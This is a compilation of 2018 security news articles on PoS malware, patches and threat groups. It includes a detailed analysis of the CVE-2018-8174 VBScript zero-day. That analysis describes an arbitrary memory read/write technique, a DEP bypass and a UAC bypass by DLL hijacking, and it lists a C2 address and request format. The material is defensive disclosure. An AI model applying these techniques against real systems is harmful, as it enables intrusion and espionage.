The availability of both code bases is expected to allow more cybercriminals to build their own PoS malware variants and start using them in attacks. However, the availability of the code also provides security researchers with the possibility to better analyze the threat. In fact, Flashpoint, which discovered the leak in March, has been working together with Cisco Talos to improve protections and disrupt potential copycats who may have obtained the leaked source code.

“In the meantime, Russian-speaking cybercriminals have been observed on the vetted underground discussing improvements and weaponization of the leaked TreasureHunter source code,” the security researchers explain in a report shared with SecurityWeek.

The original malware developer is likely a Russian speaker who is proficient in English. According to Flashpoint, the threat might have been originally developed for the notorious underground shop dump seller BearsInc, but the reason why the code was leaked is unknown.

TreasureHunter likely installed using weak credentials. The attacker accesses a Windows-based server and the point-of-sale terminal, installs the threat, and then establishes persistence through creating a registry key to execute the malware at startup.

The threat then enumerates running processes and starts scanning the device memory for track data such as primary account numbers (PANs), separators, service codes, and more. Next, it establishes a connection with the C&C and sends the stolen data to the attacker.

“Besides alina, vskimmer and other sniffers, Treasure Hunter still sniffs (not at a very high rate, but it still does) and besides that, since now you have the source code, it can be update anytime for your own needs,” the actor behind the TreasureHunter leak apparently said.

Internally, the code project was supposedly called trhutt34C. The malware is written in pure C with no C++ features and was originally compiled in Visual Studio 2013 on Windows XP. The researchers believe the malware author was also looking to improve and redesign various features including anti-debugging, code structure, and gate communication logic.

The source code is consistent with the previously analyzed TreasureHunter samples and a config.h file shows “definite signs of modification over the lifespan of the malware.” More recent samples write useful config values directly into the fields, which makes them smaller.


LG Patches Serious Vulnerabilities in Smartphone Keyboard
10.5.2018 securityweek
Vulnerebility

Updates released this week by LG for its Android smartphones patch two high severity keyboard vulnerabilities that can be exploited for remote code execution.

The vulnerabilities were reported to LG late last year by Slava Makkaveev of Check Point Research. The electronics giant patched them with its May 2018 updates, which also include the latest security fixes released by Google for the Android operating system (security patch level 2018-05-01).

According to Check Point, the flaws affect the default keyboard (LG IME) shipped with all mainstream LG smartphones. Researchers successfully reproduced and exploited the security holes on LG G4, G5 and G6 devices.

An attacker could exploit the flaws to remotely execute arbitrary code with elevated privileges by manipulating the keyboard update process, specifically for the MyScript handwriting feature. Hackers can leverage the weaknesses to log keystrokes and capture credentials and other potentially sensitive data.

The first vulnerability is related to installing new languages or updating existing ones. The device obtains the necessary files from a hardcoded server over an HTTP connection, which allows a man-in-the-middle (MitM) attacker to deliver a malicious file instead of the legitimate update.

The second flaw can be exploited by an MitM attacker to control the location where a file is downloaded. A path traversal issue allows hackers to place a malicious file in the LG keyboard package sandbox by including the targeted location in the name of the file.

If the file is assigned a .so extension, it will be granted executable permissions. In order to get the keyboard app to load the malicious file, the attacker can appoint it as an “input method extension library” in the keyboard configuration file. The malware will be loaded as soon as the keyboard application is restarted.

LG noted in its advisory that the vulnerabilities only impact the MyScript handwriting feature.

Reports published last year showed that LG had a 20 percent market share in the U.S. and 4 percent globally. This means there are plenty of devices that hackers could target using the vulnerabilities discovered by Check Point. On the other hand, there are also many critical and high severity flaws in Android itself that hackers could try to exploit and those can pose a bigger risk considering that they could be weaponized against multiple Android smartphone brands.


Firefox 60 Brings Support for Enterprise Deployments
10.5.2018 securityweek Security

Released on Wednesday, Firefox 60 allows IT administrators to customize the browser for employees, and is also the first browser to feature support for the Web Authentication (WebAuthn) standard.

The new application release also comes with various security patches, on-by-default support for the latest draft TLS 1.3, redesigned Cookies and Site Storage section in Preferences, and other enhancements.

To configure Firefox Quantum for their organization, IT professionals can either use Group Policy on Windows, or a JSON file that works across Mac, Linux, and Windows operating systems, Mozilla says. What’s more, enterprise deployments are supported for both the standard Rapid Release (RR) of Firefox or the Extended Support Release (ESR), which is now version 60.

While the standard Rapid Release automatically receives performance improvements and new features on a six-week basis, the Extended Support Release usually receives the features in a single update per year. Critical security updates are delivered to both releases as soon as possible.

Mozilla has published the necessary information for IT professionals to get started with using Firefox Quantum in their organization on this site.

The WebAuthn standard allows end users to use a single device to log into their accounts without typing a password. The feature is available only on websites that have adopted the standard and can also be used as a secondary authentication after entering a password.

“Essentially, WebAuthn is a set of anti-phishing rules that uses a sophisticated level of authenticators and cryptography to protect user accounts. It supports various authenticators, such as physical security keys today, and in the future mobile phones, or biometric mechanisms such as face recognition or fingerprints,” Mozilla explains.

One of the first major web services to have adopted the standard is Dropbox, which announced on Wednesday that WebAuthn is now supported as a two-step verification.

Firefox 60 also brings along patches for over two dozen security vulnerabilities, including two memory safety bugs rated Critical severity.

The latest version of the browser patches 6 High severity flaws, namely use-after-free with SVG animations and clip paths, use-after-free with SVG animations and text paths, same-origin bypass of PDF Viewer to view protected PDF files, insufficient sanitation of PostScript calculator functions in PDF viewer, integer overflow and out-of-bounds write in Skia, and uninitialized memory use by WebRTC encoder.

A total of 14 Medium severity flaws were addressed in the new release (including one that only affects Windows 10 users running the April 2018 update or later), alongside 4 Low risk issues.


Protego Labs Raises $2 Million in Seed Funding
10.5.2018 securityweek IT

Serverless application security firm Protego Labs announced Wednesday that it has raised $2 million seed funding from a group of investors led by Ron Gula of Gula Tech Adventures, Glilot Capital Partners, and the MetroSITE Group of security industry pioneers, including former RSA CTO, Tim Belcher.

The serverless approach -- where the server being used is managed by a cloud provider rather than the application owner -- offers great advantages in speed, simplicity and cost-savings. Gula believes it is a transformative step in leveraging the full potential of the public cloud.

Protego"But," he adds, "but it also presents a host of new threats and security challenges that traditional application security cannot handle. Protego offers a security solution designed specifically with serverless in mind, putting it at the forefront of this major technology shift."

Protego summarizes the security problem in a blog published in March 2018. "Not owning the platform means not being able to leverage the platform for security in ways you might have in the past. You’re at the mercy of whatever security mechanisms the cloud provider puts in place for you, and those rarely provide the level and granularity of protection you’d like."

The Protego platform operates by continuously scanning the serverless infrastructure, including functions, logs, and databases. It uses machine-based analysis and deep learning algorithms to build a model of normal behavior to find threats by anomaly detection as they initiate and begin to propagate. It does this in real time allowing the minimal effective protection dose in the right place -- maximizing security while minimizing costs.

Protego has offices in Baltimore, MD, and Israel. It was founded by Tsion (TJ) Gonen, Hillel Solow, Shali Mor, Itay Harush and Benny Zemmour. In January 2018 it won the Startup Competition for the most innovative cyber initiative at the Cybertech Tel Aviv 2018 Conference.


'Allanite' Group Targets ICS Networks at Electric Utilities in US, UK
10.5.2018 securityweek ICS

A threat actor has been targeting business and industrial control networks at electric utilities in the United States and United Kingdom, according to industrial cybersecurity firm Dragos.

The group, tracked as “Allanite,” has been linked to campaigns conducted by Dragonfly (aka Energetic Bear and Crouching Yeti) and Dymalloy, which Dragos discovered while analyzing Dragonfly attacks.

Allanite

According to Dragos, a report published by the DHS in October 2017 combined Dragonfly attacks with Allanite activity. The company also noted that Allanite’s operations closely resemble the Dragonfly-linked Palmetto Fusion campaign described by the DHS in July 2017. However, while their targets and techniques are similar, Dragos believes Allanite is different from Dragonfly and Dymalloy.

Allanite leverages phishing and watering hole attacks to gain access to targeted networks. The group does not use any malware and instead relies on legitimate tools often available in Windows, Dragos says.

While the U.S. government and private sector companies have linked Allanite activity to Russia, Dragos says it “does not corroborate the attribution of others.”

In July 2017, US officials told the press that the hackers had not gained access to operational networks, but Dragos confirmed third-party reports that Allanite did in fact harvest information directly from ICS networks.

Allanite has been active since at least May 2017 and continues to conduct campaigns. Its operations target both business and ICS networks at electric utilities in the US and UK in an effort to conduct reconnaissance and collect intelligence.

Dragos believes with moderate confidence that the threat actor gains access to industrial systems in an effort to obtain information needed to develop disruptive capabilities and be ready in case it decides to cause damage. However, the security firm says the group has yet to actually cause any disruption or damage.

Dragos’ report on Allanite is the first in a series focusing on threat groups targeting critical infrastructure. Information on each actor will be made available through an Activity Groups dashboard, with full technical details made available to paying customers.


Is The Education System Keeping Women Out of Cybersecurity?
10.5.2018 securityweek Cyber

While the Gender Bias in Professions Remains Strong, There Are Indications That Factors Beyond Genuine Aptitude Are at Play

Despite the increasing cybersecurity skills shortage, projected by Frost & Sullivan to reach 1.8 million unfilled roles by 2020, we are yet to engage with the obvious solution. There is currently more interest in reducing vacancies using artificial intelligence (AI) and automation than in training youngsters to adopt the profession.

The problem with AI as a solution, according to a report published Tuesday by ProtectWise, is, "The impact of artificial intelligence on the man-hours required to staff a security operations center is basically nil today -- and will be for a significant amount of time."

This is confirmed by a separate survey (PDF) published Wednesday by Exabeam. Exabeam queried 481 cybersecurity professionals around the world. It found nearly 68% of respondents reported they do not currently use AI or ML in their jobs or don’t have plans to use in the future, even though 75% agreed AI/ML can make their job better or easier and improve security.

The short-term solution to the skills gap must necessarily be to increase skills rather than the long-term reduction of demand.

Together with the skills gap is an awareness of the paucity of women in security. This is also confirmed by Exabeam's study, which found that 90% of security professionals are male.

ProtectWise returned to the data it gathered in an ESG survey last year, but specifically looked for any indication that the two problems may be linked: in short, could increasing the number of young women entering the security profession reduce the skills gap?

What it found is somewhat counterintuitive. Although the well-known gender bias in professions remains strong, there are indications that factors other than genuine aptitude are at play. In high school, twice as many men as women plan to study engineering, computer science or mathematics at college. Similarly, twice as many men as women consider IT as a future career.

At the same time, women are less confident in their aptitude for a career in cybersecurity. Forty-two percent of women profess to not knowing enough about the subject, compared to 35% of men; while 34% of women (compared to 25% of men) consider they do not have the aptitude.

What is surprising, however, is that the early exposure to technology that is believed to be the springboard to first studies and then careers in IT is stronger in young women than it is in young men. As many women as men game online, and the numbers that consider themselves to be early adopters of technology are also similar.

In some cases, however, young women are actually the early adopters -- 52% of women had tried VR compared to 42% of men; and more women than men have advanced technology in their household.

One conclusion that can be drawn is that the education system is the block. Young men and women enter the system with an equal aptitude for technology in general; but fewer women than men leave it to pursue technology careers. More concerning for cybersecurity is that very few of either gender consider security as a potential career.

A primary reason is that they simply do not have the option. Sixty-nine percent of the respondents said they had never taken a cybersecurity class in school, and 65% said that their school never offered a cybersecurity course.

This lack of interest from the schools does their pupils no favors. The Exabeam study shows a median salary range of $75,000 - $100,000 per year, with 34% earning more than $100,000 per year (chief security officers can expect around $200,000 and above); while 86% of existing professionals would recommend a career as a security analyst to new graduates. Good money and job satisfaction should be strong incentives.

ProtectWise co-founder and CTO Gene Stevens believes the problem is a latency between society's needs and society's understanding of those needs. “Our society has not yet embraced cybersecurity as a civilization-defining competency, yet it is exactly central to our capacity to function in this massively technological age," he told SecurityWeek. "In foundational terms, it's an education and awareness problem."

The solution is a sustained effort to get cybersecurity into the educational syllabus. "In education," he continued, "one of the best roads is to have cybersecurity technology standards baked into state standards of expectation for all students. State boards review these on a regular basis, usually every three to five years. We should reach out to departments of education state by state to engage on this topic. As digital citizenship is currently being developed locally, we need to reach out to school counselors and partner with teachers -- reaching out to education associations to offer resource and support is easy and could be highly beneficial."

While educational restraints may be playing a part in a lacking cybersecurity workforce, Ashley Arbuckle, Cisco’s VP of Security Services, believes that inclusion will help put a stop the perpetual scrambling for cybersecurity workers.

“No matter how you measure it, the number of unfilled cybersecurity positions is big and it’s a problem we’ve been lamenting for years,” Arbuckle wrote in a recent SecurityWeek column. “The traditional approach to address the shortage has been to encourage more individuals to pursue technical and engineering degrees. But which individuals? And if you aren’t “technical” does that mean there’s no room for you in cybersecurity? If we think more broadly about the type of talent we need and how to build even better security teams, we’ll see that the solution to the workforce gap is through inclusion.”

Arbuckle also believes there is no one definition of a cybersecurity professional and no one path to get there. “By increasing awareness of the varied skills needed and providing support to cultivate such talent, we have an opportunity to expand the pool of workers and improve security and financial performance in the process, with teams that are based on inclusion and diversity. We need to marshal all our resources to strengthen our defenses,” Arbuckle said.


Lenovo releases updates to fix Secure Boot flaw in servers and other issues
10.5.2018 securityaffairs 
Vulnerebility

Lenovo has released security patches that address the High severity vulnerability CVE-2017-3775 in the Secure Boot function on some System x servers.
The standard operator configurations disable signature checking, this means that some Server x BIOS/UEFI versions do not properly authenticate signed code before booting it.

“Lenovo internal testing discovered some System x server BIOS/UEFI versions that, when Secure Boot mode is enabled by a system administrator, do not properly authenticate signed code before booting it. As a result, an attacker with physical access to the system could boot unsigned code.” reads the security advisory.

“Lenovo ships these systems with Secure Boot disabled by default, because signed code is relatively new in the data center environment, and standard operator configurations disable signature checking.”

An attacker can exploit the vulnerability to execute unauthenticated code at the bootstrap of the affected system. The CVE-2017-3775 vulnerability impacts a dozen models, including Flex System x240 M5, x280 X6, x480 X6, x880, x3xxx series, and NeXtScale nx360 M5 devices.

Lenovo disclosed the complete list of impacted products and provided the related BIOS/UEFI update, it also explained that they ship with Secure Boot disabled by default.

Lenovo

Lenovo also issued a patch to address the CVE-2018-9063 buffer overflow in Lenovo System Update Drive Mapping Utility. -The flaw could be exploited by attackers for different kind of attacks, include the execution of arbitrary code on the target machine.

“MapDrv (C:\Program Files\Lenovo\System Update\mapdrv.exe) contains a local vulnerability where an attacker entering very large user ID or password can overrun the program’s buffer, causing undefined behaviors, such as execution of arbitrary code.” reads the security advisory.

“No additional privilege is granted to the attacker beyond what is already possessed to run MapDrv.”

The flaw could be easily exploited by an attacker entering very large user ID or password in order to overrun the program’s buffer. The attacker could potentially execute code with the MapDrv’s privileges.

Users need to update the application to Lenovo System Update version 5.07.0072 or later.

Users can launch Lenovo System Update to automatically checks for newer versions and accept the update if present, otherwise it is possible to manually update the application downloading the latest app version from the company website.


Analysis of CVE-2018-8174 VBScript 0day and APT actor related to Office targeted attack
10.5.2018 securityaffairs 
Vulnerebility

Recently, the Advanced Threat Response Team of 360 Core Security Division detected an APT attack exploiting a 0-day vulnerability tracked as CVE-2018-8174. Now the experts published a detailed analysis of the flaw.
I Overview
Recently, the Advanced Threat Response Team of 360 Core Security Division detected an APT attack exploiting a 0-day vulnerability and captured the world’s first malicious sample that uses a browser 0-day vulnerability. We codenamed the vulnerability as “double kill” exploit. This vulnerability affects the latest version of Internet Explorer and applications that use the IE kernel. When users browse the web or open Office documents, they are likely to be potential targets. Eventually the hackers will implant backdoor Trojan to completely control the computer. In response, we shared with Microsoft the relevant details of the 0day vulnerability in a timely manner. This APT attack was analyzed and attributed upon the detection and we now confirmed its association with the APT-C-06 Group.

On April 18, 2018, as soon as 360 Core Security detected the malicious activity, we contacted Microsoft without any delay and submitted relevant details to Microsoft. Microsoft confirmed this vulnerability on the morning of April 20th and released an official security patch on May 8th. Microsoft has fixed the vulnerability and named it CVE-2018-8174. After the vulnerability was properly resolved, we published this report on May 9th, along with further technical disclosure of the attack and the 0day.

II Affection in China
According to the sample data analysis, the attack affected regions in China are mainly distributed in provinces that actively involved in foreign trade activities.Victims include trade agencies and related organizations.

III Attack Procedure Analysis
The lure documents captured in this attack are in Yiddish. The attackers exploit office with OLE autolink objects (CVE-2017-0199) to embed the documents onto malicious websites. All the exploits and malicious payload were uploaded through remote servers.

Once victims opened the lure document, Word will firstly visit a remote website of IE vbscript 0day (CVE-2018-8174) to trigger the exploit. Afterward, Shellcode will be running to send several requests to get payload from remote servers. The payload will then be decrypted for further attack.

While the payload is running, Word will release three DLL backdoors locally. The backdoors will be installed and executed through PowerShell and rundll32. UAC bypass was used in this process, as well as file steganography and memory reflection uploading, in order to bypass traffic detection and to complete loading without any files.

IV IE VBScript 0day (CVE-2018-8174)
1. Timeline
On April 18, 2018, Advanced Threat Response Team of 360 Core Security Division detected a high-risk 0day vulnerabilities. The vulnerability affects the latest version of Internet Explorer and applications that use the IE kernel and has been found to be used for targeted APT attacks. On the same day, 360 immediately communicated with Microsoft and submitted details of the vulnerability to Microsoft. Microsoft confirmed this vulnerability on the morning of April 20th and released an official security patch on May 8th. The 0day vulnerability was fixed and it was named CVE-2018-8174.

CVE-2018-8174 is a remote code execution vulnerability of Windows VBScript engine. Attackers can embed malicious VBScript to Office document or website and then obtain the credential of the current user, whenever the user clicks, to execute arbitrary code.

2. Vulnerability Principles
Through the statistical analysis of the vulnerability samples, we found out that obfuscation was used massively. Therefore, we filtered out all the duplicated obfuscation and renamed all the identifiers.

Seeing from the POC created by using the exploit samples we captured, the principles of the exploit is obvious. The POC samples are as below:

Detailed procedures:

1) First create a cla1 instance assigned to b, and then assign value 0 to b, because at this point b’s referenced count is 1, causing cla1’s Class_Terminate function to be called.
2) In the Class_Terminate function, again assign b to c and assign 0 to b to balance the reference count.
3) After the Class_Terminate return, the memory pointed to by the b object will be released, so that a pointer to the memory data of the released object b is obtained.
4) If you use another object to occupy the freed memory, it will lead to the typical UAF or Type Confusion problem

3. Exploitation
The 0-day exploit exploits UAF multiple times to accomplish type confusion. It fakes and overrides the array object to perform arbitrary address reading and writing. In the end, it releases code to execute after constructing an object. Code execution does not use the traditional ROP or GodMod, but through the script layout Shellcode to stabilize the use.

Fake array to perform arbitrary address reading and writing
Mem members of 2 classes created by UAF are offset by 0x0c bytes, and an array of 0x7fffffff size is forged by reading and writing operation to the two mem members.

typedef struct tagSAFEARRAY {
USHORT cDims; // cDims = 0001
USHORT fFeatures; fFeatures =0x0880
ULONG cbElements; // the byte occupied by one element (1 byte)
ULONG cLocks;
PVOID pvData; // Buffer of data starts from 0x0
SAFEARRAYBOUND rgsabound[1];
} SAFEARRAY, *LPSAFEARRAY;

typedef struct tagSAFEARRAYBOUND {
ULONG cElements; // the number of elements (0x7fffffff, user space)
LONG lLbound; // the initial value of the index (starting from 0)
} SAFEARRAYBOUND, *LPSAFEARRAYBOUND;

A forged array composes of a one-dimensional array, the number of elements is 7fffffff, each element occupies 1 byte, and the element memory address is 0. So the accessible memory space for the array is from 0x00000000 to 0x7ffffffff*1. Therefore, the array can be read and written at any address. But the storage type of lIlIIl is string, so only by modifying the data type to 0x200C, i.e. VT_VARIANT|VT_ARRAY( array type), attackers can achieve their purpose.

Read the storage data of the specified parameter

In the malicious code, the above function is mainly used to read the data of the memory address specified by the parameter. The idea is to obtain the specified memory read capability via the characteristics of the first 4 bytes of the string address (namely, the content of the bstr, type, size field) returned by the lenb (bstr xx) in the vb (the data type in the VBS is bstr).

This is shown in the above code. If the input argument is addr(0x11223344), first add 4 to the value to get 0x11223348, and then set the variant type to 8 (string type). Next, call len function: if found to be BSTR type, vbscript will assume that the forward 4 bytes (0x11223344) is the address memory to store the length. So the len function will be executed and the value of the specified memory address will be returned.

Obtain Key DLL Base Address
The attacker leaks the virtual function table address of the CScriptEntryPoint object in the following way, which belongs to Vbscript.dll.

Obtain the vbscript.dll base address in the following way.

Because vbscript.dll imported msvcrt.dll, the msvcrt.dll base address was obtained by traversing the vbscript.dll import table, msvcrt.dll introduces kernelbase.dll, ntdll.dll, and finally the NtContinue, VirtualProtect function address was obtained.


Bypass DEP to execute shellcode
Use arbitrary reading and writing technique to modify the VAR type type to 0x4d, and then assign it with a value of 0 to make the virtual machine perform VAR:: Clear function.
Control with caution and let the code Execute function ntdll!ZwContinue. The first parameter CONTEXT structure was also constructed by the attacker.


Control the code with caution to execute ntdll! ZwContinue function. The first parameter CONTEXT structure is also carefully constructed by the attacker.
The first parameter of ZwContinue is a pointer to the CONTEXT structure. The CONTEXT structure is shown in the following figure, and the offset of EIP and ESP in CONTEXT can be calculated.

5. The values of the Eip and Esp in the actual runtime CONTEXT and the attacker’s intention are shown in the figure below.

V Powershell Payload
After the bait DOC file is executed, it will start to execute the Powershell command to the next step payload.

First of all, Powershell will fuzzy match incoming parameter names, and it is case-insensitive.

Second step, decrypt the obfuscated command.

Next, the script uses a special User-Agent access URL page to request the next load and execute.

The size of the requested payload file is approximately 199K. The code fragment is as follows.

 

We found that this code was modified from invoke-ReflectivePEInjection.ps1. buffer_x86 and buffer_x64 in the code are the same function but from different versions of dll files. File export module name: ReverseMet.dll.

DLL file decrypts ip address, port and sleep time from the configuration. After the decryption algorithm xor 0xA4, and subtracted 0x34, the code is as follows.

Decryption configuration file from the ip address 185.183.97.28 port 1021 to obtain the next load and execute.

 After it connects to the tcp port, it will get 4 bytes to apply for a memory.
Subsequent acquired writes into the new thread, and execute the acquired shellcode payload, Since the port of the sample CC server is closed, we cannot get the next load for analysis.

VI UAC Bypass Payload
In addition to use PowerShell to load the payload, the bait DOC file also runs rundll32.exe to execute another backdoor locally. There are several notable features of the backdoor program it uses: the program uses COM port to copy files, realize UAC bypass and two system DLL hijacks; it also uses the default DLLs of cliconfg.exe and SearchProtocolHost.exe to take advantage of whitelist; finally in the process of component delivery, use file steganography and memory reflection loading method to avoid traffic monitoring and achieve no file landing load.

1. Retro backdoor execution
The backdoor program used in this attack is actually the Retro series backdoor known to be used by the APT-C-06 organization. The following is a detailed analysis of the implementation process of the backdoor program.

First execute the DLL disguised as a zlib library function with rundll32 and execute the backdoor installation functions uncompress2 and uncompress3.

It uses a COM port for UAC bypass, copying its own DLL to the System32 path for DLL hijacking, and the hijacked targets are cliconfg.exe and SearchProtocolHost.exe


Copy the DLL file in the AppData directory to the System32 directory through the COM interface and name it msfte.dll and NTWDBLIB.dll.

Then copy the file NTWDBLIB.dll to the System directory and execute the system’s own cliconfig to achieve DLL hijacking and load NTWDBLIB.dll.

The role of NTWDBLIB.dll is to restart the system service WSearch, and then start msfte.dll.


The script will then generate and execute the MO4TH2H0.bat file in the TEMP directory, which will delete the NTWDBLIB.DLL and its own BAT from the system directory.

Msfte.dll is the final backdoor program whose export is disguised as zlib. The core export functions are AccessDebugTracer and AccessRetailTracer. Its main function is to communicate with CC and further download and execute subsequent DLL programs.

Similar to the previously analyzed sample, it is also using image steganography and memory reflection loading. The decrypted CC communication information is as follows:

The format of the request is:

Hxxp://CC_Address /s7/config.php ?p=M&inst=7917&name=

Among them, the parameter p is the current process authority, there are two types of M and H, inst parameter is the current installation id, name is the CC_name obtained by decryption, this time is pphp.

After decryption after downloading, the process is exactly the same as the format of the previous image steganography transmission.

For the CC URL corresponding to the test request, because we did not obtain the corresponding image during the analysis, the CC is suspected to have failed.

In the implementation process, Retro disguised fake SSH and fake zlib, intended to obfuscate and interfere with users and analysts. Retro’s attack method has been used since 2016.

2. Retro backdoor evolvement
The back door program used in the APT-C-06 organization’s early APT operation was Lucker. It is a set of self-developed and customized modular Trojans. The set of Trojans is powerful, with keyboard recording, voice recording, screen capture, file capture and U disk operation functions, etc. The Lucker ‘s name comes from the PDB path of this type of Trojan, because most of the backdoor’s function use the LK abbreviation.

In the middle to late period we have discovered its evolution and two different types of backdoor programs. We have named them Retro and Collector by the PDB path extracted from the program. The Retro backdoor is an evolution of the Lucker backdoor and it actives in a series of attacks from 2016 till now. The name comes from the pdb path of this type of Trojan with the label Retro, and also has the word Retro in the initial installer.

C:\workspace\Retro\DLL-injected-explorer\zlib1.pdb
C:\workspace\Retro\RetroDLL\zlib1.pdb

The evolution of the reflective DLL injection technique can be found from the relevant PDB paths, and there are a lot of variants of this series of backdoors.

VII Attribution
1. Decryption Algorithm
During the analysis, we found the decryption algorithm that malware used is identical to APT-C-06’s decryption algorithm.

In the further analysis, we found the same decryption algorithm was used in the 64-bit version of the relevant malware.

2. PDB Path
The PDB path of the malware used in this attack has a string of “Retro”. It is one specific feature of Retro Trojan family.

3. Victims
In the process of tracing victims, we found one special compromised machine. It has a large amount of malware related to APT-C-06. By looking at these samples in chronological order, the evolution of the malicious program can be clearly seen. The victim has been under constant attack acted by APT-C-06 since 2015. The early samples on the compromised machine could be associated with DarkHotel. Then it was attacked by Lurker Trojan. Recently it was under the attack exploiting 0-day vulnerabilities CVE-2018-8174.

VIII Conclusion
APT-C-06 is an overseas APT organization which has been active for a long time. Its main targets are China and some other countries. Its main purpose is to steal sensitive data and conduct cyber-espionage. DarkHotel can be regarded as one of its series of attack activities.
The attacks against China specifically targeted government, scientific research institutions and some particular field. The attacks can be dated back to 2007 and are still very active. Based on the evidence we have, the organization may be a hacker group or intelligence agency supported by a foreign government.
The attacks against China have never stopped over the past 10 years. The Techniques the group uses keep evolving through time. Based on the data we captured in 2017, targets in China are trade related institutions and concentrated in provinces that have frequent trading activities. The group has been conducting long-term monitoring on the targets to stole confidential data.
During the decades of cyber attacks, APT-C-06 exploits several 0-day vulnerabilities and used complicated malware. It has dozens of function modules and over 200 malicious codes.
In April, 2018, the Advanced Threat Response Team of 360 Core Security Division takes the lead in capturing the group’s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild, and then discovers the new type attack – Office related attack exploiting 0-day VBScript vulnerabilities.
After the capture of the new activity, we contacted Microsoft immediately and shared detailed information with them. Microsoft’s official security patch was released on 8th May. Now, we published this detailed report to disclose and analyze the attack.

Further technical details including IoCs are reported in the analysis published by 360 Core Security Team at the following URL:

http://blogs.360.cn/blog/cve-2018-8174-en/


Misinterpretation of Intel docs is the root cause for the CVE-2018-8897 flaw in Hypervisors and OSs
10.5.2018 securityaffairs 
Vulnerebility

Developers of major operating systems and hypervisors misread documentation from Intel and introduced a the CVE-2018-8897 vulnerability into to their products.
The development communities of major operating systems and hypervisors misread documentation from Intel and introduced a potentially serious vulnerability to their products.

The CERT/CC speculates the root cause of the flaw is the developers misinterpretation of existing documentation provided by chip manufacturers.

“The MOV SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction” states the advisory published by CERT/CC.

The flaw, tracked as CVE-2018-8897, relates the way the operating systems and hypervisors handle MOV/POP to SS instructions.

“In some circumstances, some operating systems or hypervisors may not expect or properly handle an Intel architecture hardware debug exception. The error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV to SS and POP to SS.” continues the security advisory published by CERT/CC.

The CVE-2018-8897 flaw was discovered by the security experts Nick Peterson of Everdox Tech and Nemanja Mulasmajic of triplefault.io.

The CERT/CC published a security advisory to warn of the CVE-2018-8897 flaw that impact the Linux kernel and software developed by major tech firms including Apple, the DragonFly BSD Project, Red Hat, the FreeBSD Project, Microsoft, SUSE Linux, Canonical, VMware, and the Xen Project (CERT/CC published the complete list of companies whose products may be impacted)

An attacker needs local access to exploit the vulnerability and the impact depends on the specific vulnerable software. In the worst scenario, attackers can, potentially, gain access to sensitive memory information or control low-level operating system functions.

“Therefore, in certain circumstances after the use of certain Intel x86-64 architecture instructions, a debug exception pointing to data in a lower ring (for most operating systems, the kernel Ring 0 level) is made available to operating system components running in Ring 3.” continues the advisory.

“This may allow an attacker to utilize operating system APIs to gain access to sensitive memory information or control low-level operating system functions.”

Experts explained that in the case of Linux, the flaw can trigger a denial-of-service (DoS) condition or cause the crash of the kernel.

According to Microsoft, an attacker can exploit the security flaw on Windows for privilege escalation.

“An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” reads the Microsoft’s kernel advisory

“To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.”

Security patches for CVE-2018-8897 flaw have been released for many OS, including the Linux kernel, Windows, Xen, and Red Hat.”

Proof-of-concept (PoC) exploits have been released for Windows and Linux operating systems.